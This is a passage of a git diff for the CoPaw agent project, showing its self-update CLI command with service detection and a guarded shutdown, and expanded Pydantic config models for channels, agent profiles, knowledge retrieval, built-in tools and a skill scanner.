+def _detect_source_type(
+    direct_url: dict[str, Any] | None,
+) -> tuple[str, str | None]:
+    """Classify the current installation origin."""
+    if not direct_url:
+        return ("pypi", None)
+
+    url = direct_url.get("url")
+    dir_info = direct_url.get("dir_info") or {}
+    if dir_info.get("editable"):
+        return ("editable", url)
+    if direct_url.get("vcs_info"):
+        return ("vcs", url)
+    if isinstance(url, str) and url.startswith("file://"):
+        return ("local", url)
+    return ("direct-url", url if isinstance(url, str) else None)
+
+
+def _detect_installation() -> InstallInfo:
+    """Inspect the current Python environment and installation style."""
+    dist = metadata.distribution("copaw")
+    # If installed through uv, the INSTALLER record will be `uv`
+    installer = (dist.read_text("INSTALLER") or "pip").strip() or "pip"
+
+    direct_url: dict[str, Any] | None = None
+    direct_url_text = dist.read_text("direct_url.json")
+    if direct_url_text:
+        try:
+            direct_url = json.loads(direct_url_text)
+        except
json.JSONDecodeError: + direct_url = None + + source_type, source_url = _detect_source_type(direct_url) + package_dir = Path(__file__).resolve().parent.parent + python_executable = sys.executable + environment_root = Path(sys.prefix).resolve() + environment_kind = ( + "virtualenv" if sys.prefix != sys.base_prefix else "system" + ) + + return InstallInfo( + package_dir=str(package_dir), + python_executable=str(python_executable), + environment_root=str(environment_root), + environment_kind=environment_kind, + installer=installer, + source_type=source_type, + source_url=source_url, + ) + + +def _probe_service(base_url: str) -> RunningServiceInfo: + """Probe a possible running CoPaw HTTP service.""" + try: + resp = httpx.get( + f"{base_url.rstrip('/')}/api/version", + timeout=2.0, + headers={"Accept": "application/json"}, + trust_env=False, + ) + resp.raise_for_status() + payload = resp.json() + except (httpx.HTTPError, ValueError): + return RunningServiceInfo(is_running=False) + + version = payload.get("version") if isinstance(payload, dict) else None + return RunningServiceInfo( + is_running=True, + base_url=base_url.rstrip("/"), + version=str(version) if version else None, + ) + + +def _process_candidate_ports() -> list[int]: + """Infer candidate local CoPaw service ports from running processes.""" + ports: list[int] = [] + for _pid, command in _process_table(): + if not _is_copaw_service_command(command): + continue + + port = _extract_port_from_command(command) + if port not in ports: + ports.append(port) + return ports + + +def _detect_running_service_from_processes( + preferred_hosts: list[str], +) -> RunningServiceInfo: + """Best-effort local process fallback for service detection.""" + for port in _process_candidate_ports(): + hosts = preferred_hosts or ["127.0.0.1", "localhost"] + for host in hosts: + result = _probe_service(_base_url(host, port)) + if result.is_running: + return result + + fallback_host = next(iter(hosts), "127.0.0.1") + return 
RunningServiceInfo( + is_running=True, + base_url=_base_url(fallback_host, port), + ) + + return RunningServiceInfo(is_running=False) + + +def _detect_running_service( + host: str | None, + port: int | None, +) -> RunningServiceInfo: + """Detect whether a CoPaw HTTP service is currently running.""" + candidates: list[str] = [] + seen: set[str] = set() + preferred_hosts: list[str] = [] + + def _remember_hosts(candidate_host: str | None) -> None: + for item in _candidate_hosts(candidate_host): + if item not in preferred_hosts: + preferred_hosts.append(item) + + def _add_candidate( + candidate_host: str | None, + candidate_port: int | None, + ) -> None: + if not candidate_host or candidate_port is None: + return + _remember_hosts(candidate_host) + for resolved_host in _candidate_hosts(candidate_host): + base_url = _base_url(resolved_host, candidate_port) + if base_url in seen: + continue + seen.add(base_url) + candidates.append(base_url) + + _add_candidate(host, port) + last = read_last_api() + if last: + _add_candidate(last[0], last[1]) + _add_candidate("127.0.0.1", 8088) + + for base_url in candidates: + result = _probe_service(base_url) + if result.is_running: + return result + + return _detect_running_service_from_processes(preferred_hosts) + + +def _running_service_display(running: RunningServiceInfo) -> str: + """Build a concise running-service description for user prompts.""" + if not running.base_url: + return "a running CoPaw service" + version_suffix = f" (version {running.version})" if running.version else "" + return f"CoPaw service at {running.base_url}{version_suffix}" + + +def _confirm_force_shutdown(running: RunningServiceInfo) -> bool: + """Ask whether `copaw shutdown` should be used before updating.""" + click.echo("") + click.secho("!" * 72, fg="yellow", bold=True) + click.secho( + "WARNING: RUNNING COPAW SERVICE DETECTED", + fg="yellow", + bold=True, + ) + click.secho("!" 
* 72, fg="yellow", bold=True) + click.secho( + f"Detected {_running_service_display(running)}.", + fg="yellow", + bold=True, + ) + click.secho( + "Running `copaw shutdown` will forcibly terminate the current " + "CoPaw backend/frontend processes.", + fg="red", + bold=True, + ) + click.secho( + "Active requests, background tasks, or unsaved work may be " + "interrupted immediately.", + fg="red", + bold=True, + ) + click.echo("") + return click.confirm( + "Run `copaw shutdown` now and continue with the update?", + default=False, + ) + + +def _run_shutdown_for_update( + info: InstallInfo, + running: RunningServiceInfo, +) -> None: + """Run `copaw shutdown` in the current environment before updating.""" + command = [info.python_executable, "-m", "copaw"] + parsed = urlparse(running.base_url or "") + if parsed.port is not None: + command.extend(["--port", str(parsed.port)]) + command.append("shutdown") + + click.echo("") + click.echo("Running `copaw shutdown` before updating...") + + try: + result = subprocess.run( + command, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + **_subprocess_text_kwargs(), + check=False, + ) + except OSError as exc: + raise click.ClickException( + "Failed to run `copaw shutdown`: " f"{exc}", + ) from exc + + output = (result.stdout or "").strip() + if output: + click.echo(output) + + if result.returncode != 0: + raise click.ClickException( + "`copaw shutdown` failed. 
Please stop the running CoPaw " + "service manually before running `copaw update`.", + ) + + +def _build_upgrade_command( + info: InstallInfo, + latest_version: str, +) -> tuple[list[str], str]: + """Build the installer command used by the detached update worker.""" + package_spec = f"copaw=={latest_version}" + installer = info.installer.lower() + if installer.startswith("uv") and shutil.which("uv"): + return ( + [ + "uv", + "pip", + "install", + "--python", + info.python_executable, + "--upgrade", + package_spec, + "--prerelease=allow", + ], + "uv pip", + ) + return ( + [ + info.python_executable, + "-m", + "pip", + "install", + "--upgrade", + package_spec, + "--disable-pip-version-check", + ], + "pip", + ) + + +def _plan_dir() -> Path: + """Directory used to persist short-lived update worker plans.""" + return WORKING_DIR / "updates" + + +def _write_worker_plan(plan: dict[str, Any]) -> Path: + """Persist a worker plan for the detached process.""" + plan_dir = _plan_dir() + plan_dir.mkdir(parents=True, exist_ok=True) + plan_path = plan_dir / f"update-{int(time.time() * 1000)}.json" + plan_path.write_text( + json.dumps(plan, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + return plan_path + + +def _spawn_update_worker( + plan_path: Path, + *, + capture_output: bool = True, +) -> subprocess.Popen[str]: + """Spawn the worker that performs the actual package upgrade.""" + worker_code = ( + "from copaw.cli.update_cmd import run_update_worker; " + "import sys; " + "sys.exit(run_update_worker(sys.argv[1]))" + ) + kwargs: dict[str, Any] = {"stdin": subprocess.DEVNULL} + if capture_output: + kwargs.update( + { + "stdout": subprocess.PIPE, + "stderr": subprocess.STDOUT, + **_subprocess_text_kwargs(), + "bufsize": 1, + }, + ) + if sys.platform == "win32": + kwargs["creationflags"] = getattr( + subprocess, + "CREATE_NEW_PROCESS_GROUP", + 0, + ) + else: + kwargs["start_new_session"] = True + + return subprocess.Popen( # pylint: disable=consider-using-with + 
[sys.executable, "-u", "-c", worker_code, str(plan_path)], + **kwargs, + ) + + +def _terminate_update_worker(proc: subprocess.Popen[str]) -> None: + """Best-effort termination for the worker and its installer child.""" + if proc.poll() is not None: + return + + try: + if sys.platform == "win32": + ctrl_break = getattr(signal, "CTRL_BREAK_EVENT", None) + if ctrl_break is not None: + proc.send_signal(ctrl_break) + try: + proc.wait(timeout=5) + return + except subprocess.TimeoutExpired: + pass + proc.terminate() + else: + os.killpg(proc.pid, signal.SIGTERM) + except (OSError, ProcessLookupError, ValueError): + return + + try: + proc.wait(timeout=5) + except subprocess.TimeoutExpired: + try: + proc.kill() + except OSError: + return + + +def _wait_for_process_exit(pid: int | None, timeout: float = 15.0) -> None: + """Wait briefly for another process to exit before updating files.""" + if pid is None or pid <= 0: + return + + if sys.platform == "win32": + try: + import ctypes + + kernel32 = ctypes.windll.kernel32 + synchronize = 0x00100000 + wait_timeout = 0x00000102 + handle = kernel32.OpenProcess(synchronize, False, pid) + if not handle: + return + try: + result = kernel32.WaitForSingleObject( + handle, + max(0, int(timeout * 1000)), + ) + if result == wait_timeout: + time.sleep(1.0) + finally: + kernel32.CloseHandle(handle) + except (AttributeError, ImportError, OSError): + time.sleep(min(timeout, 2.0)) + return + + deadline = time.monotonic() + timeout + while time.monotonic() < deadline: + try: + os.kill(pid, 0) + except OSError: + return + time.sleep(0.1) + + +def _run_update_worker_foreground(plan_path: Path) -> int: + """Run the update worker in a child process and wait for completion.""" + try: + proc = _spawn_update_worker(plan_path) + except OSError as exc: + raise click.ClickException( + "Failed to start update worker: " f"{exc}", + ) from exc + + try: + with proc: + if proc.stdout is not None: + for line in proc.stdout: + click.echo(line.rstrip()) + return 
proc.wait() + except KeyboardInterrupt: + click.echo("") + click.echo("[copaw] Update interrupted. Stopping installer...") + _terminate_update_worker(proc) + return 130 + + +def _run_update_worker_detached(plan_path: Path) -> None: + """Launch the update worker and return immediately.""" + try: + _spawn_update_worker(plan_path, capture_output=False) + except OSError as exc: + raise click.ClickException( + "Failed to start update worker: " f"{exc}", + ) from exc + + +def _load_worker_plan(plan_path: str | Path) -> dict[str, Any]: + """Load a persisted worker plan.""" + return json.loads(Path(plan_path).read_text(encoding="utf-8")) + + +def run_update_worker(plan_path: str | Path) -> int: + """Run the update worker and stream installer output.""" + path = Path(plan_path) + plan = _load_worker_plan(path) + command = [str(part) for part in plan["command"]] + + _wait_for_process_exit(plan.get("launcher_pid")) + + click.echo("") + click.echo( + "[copaw] Updating CoPaw " + f"{plan['current_version']} -> {plan['latest_version']}...", + ) + click.echo(f"[copaw] Using installer: {plan['installer_label']}") + + try: + with subprocess.Popen( + command, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + **_subprocess_text_kwargs(), + bufsize=1, + ) as proc: + if proc.stdout is not None: + for line in proc.stdout: + click.echo(line.rstrip()) + return_code = proc.wait() + except FileNotFoundError as exc: + click.echo(f"[copaw] Update failed: {exc}") + return_code = 1 + finally: + try: + path.unlink(missing_ok=True) + except OSError: + pass + + if return_code == 0: + click.echo("[copaw] Update completed successfully.") + click.echo( + "[copaw] Please restart any running CoPaw service " + "to use the new version.", + ) + else: + click.echo(f"[copaw] Update failed with exit code {return_code}.") + click.echo( + "[copaw] Please fix the error above and run " + "`copaw update` again.", + ) + + return return_code + + +def _echo_install_summary(info: InstallInfo, latest_version: 
str) -> None: + """Print the update summary shown before launching the worker.""" + click.echo(f"Current version: {__version__}") + click.echo(f"Latest version: {latest_version}") + click.echo(f"Python: {info.python_executable}") + click.echo( + f"Environment: {info.environment_kind} " + f"({info.environment_root})", + ) + click.echo(f"Install path: {info.package_dir}") + click.echo(f"Installer: {info.installer}") + + +def _confirm_source_override(info: InstallInfo, yes: bool) -> bool: + """Confirm whether a non-PyPI installation should be overwritten.""" + if info.source_type == "pypi": + return True + + detail = f" ({info.source_url})" if info.source_url else "" + message = ( + "Detected a non-PyPI installation source: " + f"{info.source_type}{detail}. Updating will overwrite the current " + "installation with the PyPI release for this environment." + ) + + if yes: + click.echo( + f"Warning: {message} Proceeding because `--yes` was provided.", + ) + return True + + click.echo(f"Warning: {message}") + return click.confirm( + "Continue and replace the current installation with the PyPI " + "version?", + default=False, + ) + + +@click.command("update") +@click.option( + "--yes", + is_flag=True, + help="Do not prompt before starting the update", +) +@click.pass_context +def update_cmd(ctx: click.Context, yes: bool) -> None: + """Upgrade CoPaw in the current Python environment.""" + info = _detect_installation() + latest_version = _fetch_latest_version() + + _echo_install_summary(info, latest_version) + + version_check = _is_newer_version(latest_version, __version__) + if version_check is False: + click.echo("CoPaw is already up to date.") + return + + if not _confirm_source_override(info, yes): + click.echo("Cancelled.") + return + + if version_check is None: + if yes: + click.echo( + "Warning: unable to compare the current version " + f"({__version__}) with the latest version ({latest_version})" + " automatically. 
Proceeding because `--yes` was provided.", + ) + elif not click.confirm( + f"Unable to compare the current version ({__version__}) with the " + f"latest version ({latest_version}) automatically. Continue with " + "update anyway?", + default=False, + ): + click.echo("Cancelled.") + return + + running = _detect_running_service( + ctx.obj.get("host") if ctx.obj else None, + ctx.obj.get("port") if ctx.obj else None, + ) + if running.is_running: + if yes: + raise click.ClickException( + "Detected " + f"{_running_service_display(running)}. " + "Please stop it before running `copaw update`, or rerun " + "without `--yes` to confirm a forced `copaw shutdown`.", + ) + if not _confirm_force_shutdown(running): + click.echo("Cancelled.") + return + _run_shutdown_for_update(info, running) + running = _detect_running_service( + ctx.obj.get("host") if ctx.obj else None, + ctx.obj.get("port") if ctx.obj else None, + ) + if running.is_running: + raise click.ClickException( + "Detected " + f"{_running_service_display(running)} after `copaw shutdown`. 
" + "Please stop it manually before running `copaw update`.", + ) + + if not yes and not click.confirm( + f"Update CoPaw to {latest_version} in the current environment?", + default=True, + ): + click.echo("Cancelled.") + return + + command, installer_label = _build_upgrade_command(info, latest_version) + plan = { + "current_version": __version__, + "latest_version": latest_version, + "installer_label": installer_label, + "command": command, + "install": asdict(info), + "launcher_pid": os.getpid() if sys.platform == "win32" else None, + } + plan_path = _write_worker_plan(plan) + click.echo("") + click.echo("Starting CoPaw update...") + + if sys.platform == "win32": + _run_update_worker_detached(plan_path) + click.echo( + "On Windows, the update will continue after this command exits " + "to avoid locking `copaw.exe`.", + ) + click.echo("Keep this terminal open until the update completes.") + return + + return_code = _run_update_worker_foreground(plan_path) + + if return_code != 0: + ctx.exit(return_code) diff --git a/src/copaw/config/__init__.py b/src/copaw/config/__init__.py index d8a8add6b..0dad53827 100644 --- a/src/copaw/config/__init__.py +++ b/src/copaw/config/__init__.py @@ -22,15 +22,15 @@ update_last_dispatch, ) -# ConfigWatcher is provided by __getattr__ (lazy-loaded). 
-# pylint: disable=undefined-all-variable __all__ = [ "AgentsRunningConfig", "Config", "ChannelConfig", "ChannelConfigUnion", "HeartbeatConfig", - "ConfigWatcher", + "SecurityConfig", + "ToolGuardConfig", + "ToolGuardRuleConfig", "get_available_channels", "get_config_path", "get_heartbeat_config", @@ -42,12 +42,3 @@ "save_config", "update_last_dispatch", ] - - -def __getattr__(name: str): - """Lazy-load ConfigWatcher to avoid pulling app.channels/lark_oapi.""" - if name == "ConfigWatcher": - from .watcher import ConfigWatcher - - return ConfigWatcher - raise AttributeError(f"module {__name__!r} has no attribute {name!r}") diff --git a/src/copaw/config/config.py b/src/copaw/config/config.py index 2e8757464..de313acec 100644 --- a/src/copaw/config/config.py +++ b/src/copaw/config/config.py @@ -1,13 +1,28 @@ # -*- coding: utf-8 -*- import os +import json +from pathlib import Path from typing import Optional, Union, Dict, List, Literal + from pydantic import BaseModel, Field, ConfigDict, model_validator +import shortuuid -from ..providers.models import ModelSlotConfig +from .timezone import detect_system_timezone from ..constant import ( HEARTBEAT_DEFAULT_EVERY, HEARTBEAT_DEFAULT_TARGET, + WORKING_DIR, ) +from ..providers.models import ModelSlotConfig + + +def generate_short_agent_id() -> str: + """Generate a 6-character short UUID for agent identification. 
+ + Returns: + 6-character short UUID string + """ + return shortuuid.ShortUUID().random(length=6) class BaseChannelConfig(BaseModel): @@ -27,7 +42,7 @@ class BaseChannelConfig(BaseModel): class IMessageChannelConfig(BaseChannelConfig): db_path: str = "~/Library/Messages/chat.db" poll_sec: float = 1.0 - media_dir: str = "~/.copaw/media" + media_dir: Optional[str] = None max_decoded_size: int = ( 10 * 1024 * 1024 ) # 10MB default limit for Base64 data @@ -42,7 +57,11 @@ class DiscordConfig(BaseChannelConfig): class DingTalkConfig(BaseChannelConfig): client_id: str = "" client_secret: str = "" - media_dir: str = "~/.copaw/media" + message_type: str = "markdown" + card_template_id: str = "" + card_template_key: str = "content" + robot_code: str = "" + media_dir: Optional[str] = None class FeishuConfig(BaseChannelConfig): @@ -54,7 +73,7 @@ class FeishuConfig(BaseChannelConfig): app_secret: str = "" encrypt_key: str = "" verification_token: str = "" - media_dir: str = "~/.copaw/media" + media_dir: Optional[str] = None class QQConfig(BaseChannelConfig): @@ -91,7 +110,7 @@ class MattermostConfig(BaseChannelConfig): url: str = "" bot_token: str = "" - media_dir: str = "~/.copaw/media/mattermost" + media_dir: Optional[str] = None show_typing: Optional[bool] = None thread_follow_without_mention: bool = False @@ -102,6 +121,16 @@ class ConsoleConfig(BaseChannelConfig): enabled: bool = True +class WecomConfig(BaseChannelConfig): + """WeCom (Enterprise WeChat) AI Bot channel config.""" + + bot_id: str = "" + secret: str = "" + media_dir: Optional[str] = None + welcome_text: str = "" + max_reconnect_attempts: int = -1 + + class MatrixConfig(BaseChannelConfig): """Matrix channel configuration.""" @@ -124,6 +153,16 @@ class VoiceChannelConfig(BaseChannelConfig): welcome_greeting: str = "Hi! This is CoPaw. How can I help you?" 
+class XiaoYiConfig(BaseChannelConfig): + """XiaoYi channel: Huawei A2A protocol via WebSocket.""" + + ak: str = "" # Access Key + sk: str = "" # Secret Key + agent_id: str = "" # Agent ID from XiaoYi platform + ws_url: str = "wss://hag.cloud.huawei.com/openclaw/v1/ws/link" + task_timeout_ms: int = 3600000 # 1 hour task timeout + + class ChannelConfig(BaseModel): """Built-in channel configs; extra keys allowed for plugin channels.""" @@ -140,6 +179,8 @@ class ChannelConfig(BaseModel): console: ConsoleConfig = ConsoleConfig() matrix: MatrixConfig = MatrixConfig() voice: VoiceChannelConfig = VoiceChannelConfig() + wecom: WecomConfig = WecomConfig() + xiaoyi: XiaoYiConfig = XiaoYiConfig() class LastApiConfig(BaseModel): @@ -182,6 +223,25 @@ class AgentsRunningConfig(BaseModel): "Maximum number of reasoning-acting iterations for ReAct agent" ), ) + + token_count_model: str = Field( + default="default", + description="Model to use for token counting", + ) + + token_count_estimate_divisor: float = Field( + default=3.75, + gt=1, + description=( + "Divisor for character-based token estimation " "(len / divisor)" + ), + ) + + token_count_use_mirror: bool = Field( + default=False, + description="Whether to use mirror token counting", + ) + max_input_length: int = Field( default=128 * 1024, # 128K = 131072 tokens ge=1000, @@ -205,12 +265,12 @@ class AgentsRunningConfig(BaseModel): ) enable_tool_result_compact: bool = Field( - default=False, + default=True, description="Whether to compact tool result messages in memory", ) tool_result_compact_keep_n: int = Field( - default=5, + default=3, ge=1, le=10, description=( @@ -218,6 +278,72 @@ class AgentsRunningConfig(BaseModel): ), ) + knowledge_enabled: bool = Field( + default=True, + description="Master switch for knowledge features and operations", + ) + + knowledge_auto_collect_chat_files: bool = Field( + default=True, + description=( + "Automatically collect file references in chat turns into knowledge sources" + ), + ) + + 
knowledge_auto_collect_chat_urls: bool = Field( + default=True, + description=( + "Automatically collect URLs mentioned in chat turns into knowledge sources" + ), + ) + + knowledge_auto_collect_long_text: bool = Field( + default=True, + description=( + "Automatically save long chat passages into text knowledge sources" + ), + ) + + knowledge_long_text_min_chars: int = Field( + default=2000, + ge=200, + le=20000, + description="Minimum character count for auto-saving long text", + ) + + knowledge_chunk_size: int = Field( + default=1200, + ge=200, + le=8000, + description="Chunk size for knowledge indexing", + ) + + knowledge_retrieval_enabled: bool = Field( + default=True, + description="Enable chat-time retrieval augmentation from indexed knowledge", + ) + + knowledge_retrieval_top_k: int = Field( + default=4, + ge=1, + le=20, + description="Number of knowledge hits injected into chat context", + ) + + knowledge_retrieval_max_context_chars: int = Field( + default=1800, + ge=300, + le=8000, + description="Maximum characters for injected retrieval context", + ) + + knowledge_retrieval_min_score: float = Field( + default=1.0, + ge=0.0, + le=100.0, + description="Minimum lexical score threshold for injected knowledge hits", + ) + @property def memory_compact_reserve(self) -> int: """Memory compact reserve size (tokens).""" @@ -254,37 +380,161 @@ class AgentsLLMRoutingConfig(BaseModel): ) -class AgentsConfig(BaseModel): - defaults: AgentsDefaultsConfig = Field( - default_factory=AgentsDefaultsConfig, +class AgentProfileRef(BaseModel): + """Agent Profile reference (stored in root config.json). + + Only contains ID and workspace directory reference. + Full agent configuration is stored in workspace/agent.json. 
+ """ + + id: str = Field(..., description="Unique agent ID") + workspace_dir: str = Field( + ..., + description="Path to agent's workspace directory", + ) + + +class AgentProfileConfig(BaseModel): + """Complete Agent Profile configuration (stored in workspace/agent.json). + + Each agent has its own configuration file with all settings. + """ + + id: str = Field(..., description="Unique agent ID") + name: str = Field(..., description="Human-readable agent name") + description: str = Field(default="", description="Agent description") + workspace_dir: str = Field( + default="", + description="Path to agent's workspace (optional, for reference)", + ) + + # Agent-specific configurations + channels: Optional["ChannelConfig"] = Field( + default=None, + description="Channel configurations for this agent", + ) + mcp: Optional["MCPConfig"] = Field( + default=None, + description="MCP clients for this agent", + ) + heartbeat: Optional[HeartbeatConfig] = Field( + default=None, + description="Heartbeat configuration for this agent", + ) + last_dispatch: Optional["LastDispatchConfig"] = Field( + default=None, + description="Last dispatch target for this agent", ) running: AgentsRunningConfig = Field( default_factory=AgentsRunningConfig, + description="Runtime configuration", ) llm_routing: AgentsLLMRoutingConfig = Field( default_factory=AgentsLLMRoutingConfig, - description="LLM routing settings (local/cloud).", + description="LLM routing settings", + ) + active_model: Optional["ModelSlotConfig"] = Field( + default=None, + description="Active model for this agent (provider_id + model)", ) language: str = Field( default="zh", - description="Language for agent MD files (zh/en/ru)", + description="Language setting for this agent", ) - installed_md_files_language: Optional[str] = Field( + system_prompt_files: List[str] = Field( + default_factory=lambda: ["AGENTS.md", "SOUL.md", "PROFILE.md"], + description="System prompt markdown files", + ) + tools: Optional["ToolsConfig"] = Field( 
+ default=None, + description="Tools configuration for this agent", + ) + security: Optional["SecurityConfig"] = Field( default=None, - description="Language of currently installed md files", + description="Security configuration for this agent", + ) + + +class AgentsConfig(BaseModel): + """Agents configuration (root config.json only contains references).""" + + active_agent: str = Field( + default="default", + description="Currently active agent ID", + ) + profiles: Dict[str, AgentProfileRef] = Field( + default_factory=lambda: { + "default": AgentProfileRef( + id="default", + workspace_dir=f"{WORKING_DIR}/workspaces/default", + ), + }, + description="Agent profile references (ID and workspace path only)", + ) + + # Legacy fields for backward compatibility (deprecated) + # These fields MUST have default values (not None) to support downgrade + defaults: Optional[AgentsDefaultsConfig] = None + running: AgentsRunningConfig = Field( + default_factory=AgentsRunningConfig, + ) + llm_routing: AgentsLLMRoutingConfig = Field( + default_factory=AgentsLLMRoutingConfig, ) + language: str = Field(default="zh") + installed_md_files_language: Optional[str] = None system_prompt_files: List[str] = Field( default_factory=lambda: ["AGENTS.md", "SOUL.md", "PROFILE.md"], - description="List of markdown files to load into system prompt", + ) + audio_mode: Literal["auto", "native"] = Field( + default="auto", + description=( + "How to handle incoming audio/voice messages. " + '"auto": transcribe if a provider is available, otherwise show ' + "file-uploaded placeholder; " + '"native": send audio blocks directly to the model ' + "(may need ffmpeg)." + ), + ) + + transcription_provider_type: Literal[ + "disabled", + "whisper_api", + "local_whisper", + ] = Field( + default="disabled", + description=( + "Transcription backend. " + '"disabled": no transcription; ' + '"whisper_api": remote OpenAI-compatible endpoint; ' + '"local_whisper": locally installed openai-whisper.' 
+ ), + ) + transcription_provider_id: str = Field( + default="", + description=( + "Provider ID for Whisper API transcription. " + "Empty = no provider selected. " + 'Only used when transcription_provider_type is "whisper_api".' + ), + ) + transcription_model: str = Field( + default="whisper-1", + description=( + "Model name for Whisper API transcription. " + 'e.g. "whisper-1", "whisper-large-v3".' + ), ) + class LastDispatchConfig(BaseModel): """Last channel/user/session that received a user-originated reply.""" channel: str = "" user_id: str = "" session_id: str = "" + dispatched_at: str = "" class MCPClientConfig(BaseModel): @@ -386,6 +636,73 @@ class BuiltinToolConfig(BaseModel): name: str = Field(..., description="Tool function name") enabled: bool = Field(True, description="Whether the tool is enabled") description: str = Field(default="", description="Tool description") + display_to_user: bool = Field( + True, + description="Whether tool output is rendered to user channels", + ) + + +def _default_builtin_tools() -> Dict[str, BuiltinToolConfig]: + """Return a fresh copy of the canonical built-in tool definitions.""" + return { + "execute_shell_command": BuiltinToolConfig( + name="execute_shell_command", + enabled=True, + description="Execute shell commands", + ), + "read_file": BuiltinToolConfig( + name="read_file", + enabled=True, + description="Read file contents", + ), + "write_file": BuiltinToolConfig( + name="write_file", + enabled=True, + description="Write content to file", + ), + "edit_file": BuiltinToolConfig( + name="edit_file", + enabled=True, + description="Edit file using find-and-replace", + ), + "browser_use": BuiltinToolConfig( + name="browser_use", + enabled=True, + description="Browser automation and web interaction", + ), + "desktop_screenshot": BuiltinToolConfig( + name="desktop_screenshot", + enabled=True, + description="Capture desktop screenshots", + ), + "view_image": BuiltinToolConfig( + name="view_image", + enabled=True, + 
description="Load an image into LLM context " + "for visual analysis", + display_to_user=False, + ), + "send_file_to_user": BuiltinToolConfig( + name="send_file_to_user", + enabled=True, + description="Send files to user", + ), + "get_current_time": BuiltinToolConfig( + name="get_current_time", + enabled=True, + description="Get current date and time", + ), + "set_user_timezone": BuiltinToolConfig( + name="set_user_timezone", + enabled=True, + description="Set user timezone", + ), + "get_token_usage": BuiltinToolConfig( + name="get_token_usage", + enabled=True, + description="Get llm token usage", + ), + } class ToolsConfig(BaseModel): @@ -438,9 +755,42 @@ class ToolsConfig(BaseModel): enabled=True, description="Get llm token usage", ), + "knowledge_search": BuiltinToolConfig( + name="knowledge_search", + enabled=True, + description="Search indexed knowledge sources", + ), + "graph_query": BuiltinToolConfig( + name="graph_query", + enabled=False, + description="Run graph-oriented knowledge query", + ), + "memify_run": BuiltinToolConfig( + name="memify_run", + enabled=False, + description="Trigger memify enrichment jobs", + ), + "memify_status": BuiltinToolConfig( + name="memify_status", + enabled=False, + description="Query memify enrichment job status", + ), + "triplet_focus_search": BuiltinToolConfig( + name="triplet_focus_search", + enabled=False, + description="Run triplet-focused graph retrieval", + ), }, ) + @model_validator(mode="after") + def _merge_default_tools(self): + """Ensure new code-defined tools are present in saved configs.""" + for name, tc in _default_builtin_tools().items(): + if name not in self.builtin_tools: + self.builtin_tools[name] = tc + return self + class ToolGuardRuleConfig(BaseModel): """A single user-defined guard rule (stored in config.json).""" @@ -470,12 +820,198 @@ class ToolGuardConfig(BaseModel): disabled_rules: List[str] = Field(default_factory=list) +class SkillScannerWhitelistEntry(BaseModel): + """A whitelisted skill 
(identified by name + content hash).""" + + skill_name: str + content_hash: str = Field( + default="", + description="SHA-256 of concatenated file contents at whitelist time. " + "Empty string means any content is allowed.", + ) + added_at: str = Field( + default="", + description="ISO 8601 timestamp when the entry was added.", + ) + + +class SkillScannerConfig(BaseModel): + """Skill scanner settings under ``security.skill_scanner``. + + ``mode`` controls the scanner behavior: + * ``"block"`` – scan and block unsafe skills. + * ``"warn"`` – scan but only log warnings, do not block (default). + * ``"off"`` – disable scanning entirely. + """ + + mode: Literal["block", "warn", "off"] = Field( + default="warn", + description="Scanner mode: block, warn, or off.", + ) + timeout: int = Field( + default=30, + ge=5, + le=300, + description="Max seconds to wait for a scan to complete.", + ) + whitelist: List[SkillScannerWhitelistEntry] = Field( + default_factory=list, + description="Skills that bypass security scanning.", + ) + + class SecurityConfig(BaseModel): """Top-level ``security`` section in config.json.""" tool_guard: ToolGuardConfig = Field(default_factory=ToolGuardConfig) + skill_scanner: SkillScannerConfig = Field( + default_factory=SkillScannerConfig, + ) + +class SkillMarketSpec(BaseModel): + """A single skills market entry.""" + + id: str = Field(..., description="Stable market id") + name: str = Field(..., description="Display name") + type: Literal["git"] = Field(default="git") + url: str = Field(..., description="Git repository URL") + branch: str = Field(default="", description="Optional branch") + path: str = Field( + default="index.json", + description="Path to market index file in repo", + ) + enabled: bool = Field(default=True) + order: int = Field(default=999) + trust: Optional[Literal["official", "community", "custom"]] = None + + +class SkillsMarketCacheConfig(BaseModel): + """Cache policy for market index aggregation.""" + + ttl_sec: int = 
Field(default=600, ge=0, le=24 * 3600) + + +class SkillsMarketInstallConfig(BaseModel): + """Default install behavior for marketplace installs.""" + + overwrite_default: bool = Field(default=False) + + +class SkillsMarketConfig(BaseModel): + """Skills market root config.""" + + version: int = Field(default=1, ge=1) + markets: List[SkillMarketSpec] = Field(default_factory=list) + cache: SkillsMarketCacheConfig = Field( + default_factory=SkillsMarketCacheConfig, + ) + install: SkillsMarketInstallConfig = Field( + default_factory=SkillsMarketInstallConfig, + ) + + +class KnowledgeSourceSpec(BaseModel): + """A configured knowledge source.""" + + id: str = Field( + ..., + min_length=1, + max_length=64, + pattern=r"^[A-Za-z0-9][A-Za-z0-9._-]*$", + ) + name: str = Field(..., min_length=1, max_length=120) + type: Literal["file", "directory", "url", "text", "chat"] = Field( + default="file", + ) + location: str = Field(default="") + content: str = Field(default="") + enabled: bool = Field(default=True) + recursive: bool = Field(default=True) + tags: List[str] = Field(default_factory=list) + summary: str = Field(default="") + + @model_validator(mode="after") + def validate_source(self): + if self.type in {"file", "directory", "url"} and not self.location.strip(): + raise ValueError( + f"location is required for knowledge source type '{self.type}'", + ) + if self.type == "text" and not ( + self.content.strip() or self.location.strip() + ): + raise ValueError( + "content or location is required for knowledge source type 'text'", + ) + return self + + +class KnowledgeIndexConfig(BaseModel): + """Indexing behavior for knowledge sources.""" + + chunk_size: int = Field(default=1200, ge=200, le=8000) + chunk_overlap: int = Field(default=150, ge=0, le=2000) + max_file_size: int = Field(default=512 * 1024, ge=1024, le=20 * 1024 * 1024) + include_globs: List[str] = Field( + default_factory=lambda: [ + "**/*.md", + "**/*.txt", + "**/*.rst", + "**/*.json", + "**/*.yaml", + "**/*.yml", + 
